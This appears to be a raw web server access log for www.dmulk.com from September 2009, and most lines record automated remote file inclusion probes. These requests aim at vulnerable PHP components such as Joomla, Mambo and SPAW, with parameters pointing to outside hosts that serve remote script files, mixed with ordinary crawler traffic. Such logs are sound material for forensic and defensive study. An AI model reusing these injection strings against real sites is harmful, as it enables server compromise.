222.239.227.142 - - [07/Sep/2009:09:37:09 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:09:37:23 -0700] "GET /logs/access_090714.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:09:37:23 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:09:37:23 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:09:37:29 -0700] "GET /logs/access_090330.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [07/Sep/2009:09:37:34 -0700] "GET /logs/access_090326.log%20%20//appserv/main.php?appserv_root=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:09:37:44 -0700] "GET /logs/access_081007.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:09:37:44 -0700] "GET /logs/access_090122.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.143.140 - - [07/Sep/2009:09:37:51 -0700] "GET /logs/access_080623.log/index.php?lang=http://maderasglob.no.comunidades.net/cmdstate.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.249.84.5 - - [07/Sep/2009:09:37:54 -0700] "GET /robots.txt HTTP/1.0" 200 36 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:09:37:54 -0700] "GET /logs/access_081111.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.249.84.5 - - [07/Sep/2009:09:39:04 -0700] "GET /logs/access_090310.log HTTP/1.1" 200 1245184 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.dmulk.com"
74.6.18.218 - - [07/Sep/2009:09:39:31 -0700] "GET /logs/access_080222.log HTTP/1.0" 200 1723765 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:09:39:36 -0700] "GET /logs/access_090422.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.151.132.176 - - [07/Sep/2009:09:39:45 -0700] "GET /logs/access_080313.log//?pg=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:09:40:29 -0700] "GET /logs/access_071024.log HTTP/1.0" 200 11603 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:09:40:44 -0700] "GET /logs/access_080530.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [07/Sep/2009:09:40:48 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.189.18.73 - - [07/Sep/2009:09:40:48 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.189.18.73 - - [07/Sep/2009:09:40:50 -0700] "GET /logs/access_071218.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.189.18.73 - - [07/Sep/2009:09:40:57 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.189.18.73 - - [07/Sep/2009:09:40:57 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.189.18.73 - - [07/Sep/2009:09:40:58 -0700] "GET /logs/access_071218.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.189.18.73 - - [07/Sep/2009:09:41:00 -0700] "GET /logs/access_071118.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.189.18.73 - - [07/Sep/2009:09:41:04 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [07/Sep/2009:09:41:04 -0700] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [07/Sep/2009:09:41:05 -0700] "GET /logs/access_071118.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.189.18.73 - - [07/Sep/2009:09:41:05 -0700] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [07/Sep/2009:09:41:06 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [07/Sep/2009:09:41:06 -0700] "GET /logs/access_071118.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [07/Sep/2009:09:41:06 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [07/Sep/2009:09:41:10 -0700] "GET /logs/access_071118.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.189.18.73 - - [07/Sep/2009:09:41:15 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.189.18.73 - - [07/Sep/2009:09:41:15 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.189.18.73 - - [07/Sep/2009:09:41:21 -0700] "GET /logs/access_090304.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:09:41:45 -0700] "GET /logs/access_090222.log HTTP/1.0" 200 3243532 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:09:41:47 -0700] "GET /logs/access_080531.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:09:41:47 -0700] "GET /embed/day.php?path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:09:41:47 -0700] "GET /logs/access_090214.log//embed/day.php?path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:09:41:47 -0700] "GET /logs//embed/day.php?path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [07/Sep/2009:09:41:55 -0700] "GET /logs/access_071118.log%20%20//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [07/Sep/2009:09:42:57 -0700] "GET /logs/access_071118.log%20%20//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.18.73 - - [07/Sep/2009:09:42:57 -0700] "GET /logs/access_071218.log%20%20//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.75.220.49 - - [07/Sep/2009:09:43:03 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.75.220.49 - - [07/Sep/2009:09:43:03 -0700] "GET /logs/access_090408.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.75.220.49 - - [07/Sep/2009:09:43:03 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:09:43:23 -0700] "GET /logs/access_080620.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:09:43:25 -0700] "GET /logs/access_090710.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
61.252.26.98 - - [07/Sep/2009:09:43:26 -0700] "GET /logs/access_090901.log//?_SERVER[DOCUMENT_ROOT]=http://GN.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [07/Sep/2009:09:43:26 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://GN.fileave.com/id1.txt? HTTP/1.1" 200 19900 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [07/Sep/2009:09:43:27 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://GN.fileave.com/id1.txt? HTTP/1.1" 200 116209 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:09:43:28 -0700] "GET /logs/access_090826.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:09:43:32 -0700] "GET /logs/access_071028.log HTTP/1.0" 200 27183 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
199.120.90.223 - - [07/Sep/2009:09:44:03 -0700] "GET /logs/access_080718.log//admin/business_inc/saveserver.php?thisdir=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.75.220.49 - - [07/Sep/2009:09:44:06 -0700] "GET /logs/access_090804.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:09:44:39 -0700] "GET /logs/access_070810.log HTTP/1.0" 200 58508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.75.220.49 - - [07/Sep/2009:09:45:27 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.75.220.49 - - [07/Sep/2009:09:45:27 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.75.220.49 - - [07/Sep/2009:09:45:27 -0700] "GET /logs/access_090408.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.136.251 - - [07/Sep/2009:09:45:35 -0700] "GET /%22/index.php?option=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.136.251 - - [07/Sep/2009:09:45:35 -0700] "GET /logs/access_080313.log/%22/index.php?option=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.136.251 - - [07/Sep/2009:09:45:35 -0700] "GET /logs/%22/index.php?option=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:09:45:46 -0700] "GET /logs/access_080606.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:09:45:48 -0700] "GET /logs/access_081214.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:09:46:02 -0700] "GET /logs/access_080719.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.75.220.49 - - [07/Sep/2009:09:46:14 -0700] "GET /logs/access_090804.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:09:46:15 -0700] "GET /logs/access_080331.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:09:46:53 -0700] "GET /logs/access_080703.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
199.120.90.223 - - [07/Sep/2009:09:47:08 -0700] "GET /logs/access_080718.log//admin/business_inc/saveserver.php?thisdir=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.149.241.187 - - [07/Sep/2009:09:47:26 -0700] "GET /logs/access_090223.log//administrator/components/com_seyret/seyret.html.php?mosConfig_absolute_path=http://kpu.feelmuziq.com/comm/attach/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.149.241.187 - - [07/Sep/2009:09:47:26 -0700] "GET /administrator/components/com_seyret/seyret.html.php?mosConfig_absolute_path=http://kpu.feelmuziq.com/comm/attach/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.149.241.187 - - [07/Sep/2009:09:47:26 -0700] "GET /logs//administrator/components/com_seyret/seyret.html.php?mosConfig_absolute_path=http://kpu.feelmuziq.com/comm/attach/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.149.241.187 - - [07/Sep/2009:09:47:26 -0700] "GET /administrator/components/com_seyret/seyret.html.php?mosConfig_absolute_path=http://kpu.feelmuziq.com/comm/attach/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.149.241.187 - - [07/Sep/2009:09:47:26 -0700] "GET /logs/access_090223.log//administrator/components/com_seyret/seyret.html.php?mosConfig_absolute_path=http://kpu.feelmuziq.com/comm/attach/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.149.241.187 - - [07/Sep/2009:09:47:26 -0700] "GET /logs//administrator/components/com_seyret/seyret.html.php?mosConfig_absolute_path=http://kpu.feelmuziq.com/comm/attach/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:09:47:42 -0700] "GET /logs/access_080713.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.67.26.40 - - [07/Sep/2009:09:47:44 -0700] "GET /logs/access_080313.log//?path%5Bdocroot%5D=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.67.26.40 - - [07/Sep/2009:09:47:44 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 200 116209 "-" "Mozilla/5.0" "www.dmulk.com"
80.67.26.40 - - [07/Sep/2009:09:47:44 -0700] "GET /?path%5Bdocroot%5D=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 200 19925 "-" "Mozilla/5.0" "www.dmulk.com"
80.67.26.40 - - [07/Sep/2009:09:47:48 -0700] "GET /logs/access_080313.log//?path%5Bdocroot%5D=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.67.26.40 - - [07/Sep/2009:09:47:48 -0700] "GET /?path%5Bdocroot%5D=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 200 19924 "-" "Mozilla/5.0" "www.dmulk.com"
80.67.26.40 - - [07/Sep/2009:09:47:49 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 200 116209 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:09:47:59 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 200 116209 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:09:48:02 -0700] "GET /logs/access_090901.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:09:48:08 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 200 19926 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:09:48:12 -0700] "GET /logs/access_080222.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
121.130.29.11 - - [07/Sep/2009:09:48:46 -0700] "GET /logs/access_080515.log/errors.php?error=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.130.29.11 - - [07/Sep/2009:09:48:46 -0700] "GET /errors.php?error=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.130.29.11 - - [07/Sep/2009:09:48:46 -0700] "GET /logs/access_080521.log/errors.php?error=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.130.29.11 - - [07/Sep/2009:09:48:46 -0700] "GET /logs/errors.php?error=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.50.85.104 - - [07/Sep/2009:09:49:05 -0700] "GET /logs/index.php?go=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.50.85.104 - - [07/Sep/2009:09:49:05 -0700] "GET /logs/access_080703.log%20%20/index.php?go=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [07/Sep/2009:09:49:07 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.4; http://dmulk.com/blog" "dmulk.com"
67.195.112.160 - - [07/Sep/2009:09:49:07 -0700] "GET /logs/access_080514.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.50.85.104 - - [07/Sep/2009:09:49:07 -0700] "GET /index.php?go=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 200 19759 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:09:49:15 -0700] "GET /ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:09:49:27 -0700] "GET /logs/access_090531.log HTTP/1.0" 200 3474968 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:09:49:28 -0700] "GET /logs/access_090314.log%20%20//ask_password.php?%20dir=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.139.66.104 - - [07/Sep/2009:09:49:49 -0700] "GET /logs//administrator/components/com_seyret/seyret.html.php?mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.139.66.104 - - [07/Sep/2009:09:49:49 -0700] "GET /logs/access_090223.log//administrator/components/com_seyret/seyret.html.php?mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.139.66.104 - - [07/Sep/2009:09:49:49 -0700] "GET /administrator/components/com_seyret/seyret.html.php?mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.111.80.234 - - [07/Sep/2009:09:50:07 -0700] "GET /logs/access_080304.log////?_SERVER[DOCUMENT_ROOT]=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.111.80.234 - - [07/Sep/2009:09:50:07 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 200 19920 "-" "Mozilla/5.0" "www.dmulk.com"
78.111.80.234 - - [07/Sep/2009:09:50:07 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 200 116211 "-" "Mozilla/5.0" "www.dmulk.com"
78.111.80.234 - - [07/Sep/2009:09:50:23 -0700] "GET /logs/access_090517.log////?_SERVER[DOCUMENT_ROOT]=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.249.68.229 - - [07/Sep/2009:09:51:13 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/060.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
67.195.112.160 - - [07/Sep/2009:09:51:28 -0700] "GET /logs/access_080827.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:09:51:45 -0700] "GET /logs/access_080421.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:09:52:01 -0700] "GET /logs/access_080712.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:09:52:01 -0700] "GET /logs/access_080712.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:09:52:01 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:09:52:01 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:09:52:01 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 200 19818 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:09:52:02 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 200 19818 "-" "Mozilla/5.0" "www.dmulk.com"
121.130.29.11 - - [07/Sep/2009:09:52:04 -0700] "GET /logs/access_080515.log%20%20/errors.php?error=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.130.29.11 - - [07/Sep/2009:09:52:04 -0700] "GET /logs/access_080521.log%20%20/errors.php?error=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
